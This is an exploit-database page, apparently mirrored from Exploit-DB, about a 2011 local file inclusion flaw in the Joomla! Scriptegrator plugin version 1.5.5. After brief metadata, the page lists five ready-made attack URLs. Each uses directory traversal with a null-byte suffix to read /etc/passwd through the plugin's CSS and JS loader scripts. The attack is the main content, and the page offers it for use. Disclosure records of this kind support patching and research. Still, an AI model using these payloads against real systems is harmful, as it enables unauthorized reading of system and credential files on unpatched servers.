[] NeoSense
E X P L O I T S
title author type platform port cve id

Joomla! Component Scriptegrator 1.5 - Local File Inclusion

Author: jdc
type: webapps
platform: php
port: 
date_added: 2011-06-13 
date_updated: 2016-11-02 
verified: 1 
codes: OSVDB-72939;OSVDB-72938 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.complg_system_cdscriptegrator_1.5.5.zip
# Exploit Title: Scriptegrator plugin for Joomla! 1.5 0day File Inclusion
# Originally Reported: Early 2011
# Independently Discovered: 20 April 2011
# Released: 13 June 2011
# Author: jdc
# Software Link: http://www.greatjoomla.com/extensions/plugins/core-design-scriptegrator-plugin.html
# Version: 1.5.5


``````````````````````````````````````````````````````````````````````````
It looks like this one was reported as in-use by someone else sometime around February (?) 2011:
*	http://www.greatjoomla.com/index.php?option=com_kunena&Itemid=171&func=view&catid=32&id=6310

Local File Inclusion
====================

http://[target]/plugins/system/cdscriptegrator/libraries/highslide/css/cssloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.css

http://[target]/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js

http://[target]/plugins/system/cdscriptegrator/libraries/jquery/theme/cssloader.php?file=../../../../../../../../../../../../etc/passwd%00.css

http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js

http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jsloader.php?file=../../../../../../../../../../../../etc/passwd%00.js
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.